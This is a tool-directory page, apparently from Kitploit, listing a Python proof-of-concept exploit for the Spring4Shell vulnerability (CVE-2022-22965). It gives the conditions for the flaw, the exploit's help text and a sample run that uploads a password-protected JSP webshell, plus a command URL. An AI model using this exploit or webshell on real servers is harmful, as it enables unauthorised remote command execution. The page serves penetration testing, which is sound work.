Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Spring4Shell-CVE-2022-22965 — Python-based proof-of-concept exploit for CVE-2022-22965 (Spring4Shell) targeting Java Spring Core RCE on Apache Tomcat. Uploads a JSP webshell with password protection for remote command execution. | Kitploit
Tools/GitHubGitHub/sohamsharma966/spring4shell-cve-2022-22965
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubsohamsharma966/spring4shell-cve-2022-22965

Spring4Shell-CVE-2022-22965

Python-based proof-of-concept exploit for CVE-2022-22965 (Spring4Shell) targeting Java Spring Core RCE on Apache Tomcat. Uploads a JSP webshell with password protection for remote command execution.

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
View Repository
13 years agoNot yet reviewed
Share

Spring4Shell: CVE-2022-22965 RCE

Java Spring framework RCE vulnerability

These vulnerabilities affects a component "Spring Core" — the heart of the framework

Current conditions for vulnerability:-

  • JDK 9+
  • A vulnerable version of the Spring Framework (<5.2 | 5.2.0-19 | 5.3.0-17)
  • Apache Tomcat as a server for the Spring application, packaged as a WAR
  • A dependency on the spring-webmvc and/or spring-webflux components of the Spring Framework

The exploit

root@kitploit:~
user@attacker:~$ ./exploit.py --help
usage: exploit.py [-h] [-f FILENAME] [-p PASSWORD] [-d DIRECTORY] url

Spring4Shell RCE Proof of Concept

positional arguments:
  url                   Target URL

optional arguments:
  -h, --help            show this help message and exit
  -f FILENAME, --filename FILENAME
                        Name of the file to upload (Default tomcatwar.jsp)
  -p PASSWORD, --password PASSWORD
                        Password to protect the shell with (Default: thm)
  -d DIRECTORY, --directory DIRECTORY
                        The upload path for the file (Default: ROOT)
root@kitploit:~
user@attacker:~$ ./exploit.py http://MACHINE_IP/
Shell Uploaded Successfully!


# OUTPUT= Your shell can be found at: http://MACHINE_IP/tomcatwar.jsp?pwd=thm&cmd=whoami
Download Tool